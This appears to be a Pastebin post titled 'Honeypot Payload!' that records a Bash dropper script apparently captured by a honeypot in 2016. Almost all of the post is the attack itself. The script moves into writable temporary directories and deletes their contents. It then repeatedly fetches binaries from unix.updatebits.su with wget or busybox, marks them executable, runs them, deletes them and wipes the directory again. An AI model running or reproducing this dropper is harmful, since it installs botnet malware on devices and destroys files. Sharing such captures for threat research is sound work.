Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-02-16 16:32

Feb 18th, 2016
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.54 KB | None | 0 0
  1. cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var
  2. rm -f *
  3. busybox wget http://unix.updatebits.su/unix8 || wget http://unix.updatebits.su/unix8; chmod +x ; ./unix8; rm -f unix8*
  4. buxybox wget http://unix.updatebits.su/unix7 || wget http://unix.updatebits.su/unix7; chmod +x unix7; ./unix7; rm -f unix7*
  5. busybox wget http://unix.updatebits.su/unix12 || wget http://unix.updatebits.su/unix12; chmod +x unix12; ./unix12; rm -f unix12*
  6. busybox wget http://unix.updatebits.su/unix3 || wget http://unix.updatebits.su/unix3; chmod +x unix3; ./unix3; rm -f unix3*
  7. busybox wget http://unix.updatebits.su/unix11 || wget http://unix.updatebits.su/unix11; chmod +x unix11; ./unix11; rm -f unix11*
  8. busybox wget http://unix.updatebits.su/unix5 || wget http://unix.updatebits.su/unix5; chmod +x unix5; ./unix5; rm -f unix5*
  9. busybox wget http://unix.updatebits.u/unix4 || wget http://unix.updatebits.su/unix4; chmod +x unix4; ./unix4; rm -f unix4*
  10. busybox wget http://unix.updatebits.u/unix10 || wget http://unix.updatebits.su/unix10; chmod +x unix10; ./unix10; rm -f unix10*
  11. busybox wget http://unix.updatebits.u/unix9 || wget http://unix.updatebits.su/unix9; chmod +x unix9; ./unix9; rm -f unix9*
  12. busybox wget http://unix.updatebits.u/unix12 || wget http://unix.updatebits.su/unix12; chmod +x unix12; ./unix12; rm -f unix12*
  13. busybox wget http://unix.updatebits.u/unix1 || wget http://unix.updatebits.su/unix1; chmod +x unix1; ./unix1; rm -f unix1*
  14. busybox wget http://unix.updatebits.u/unix2 || wget http://unix.updatebits.su/unix2; chmod +x unix2; ./unix2; rm -f unix2*
  15. rm -f *
  16. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement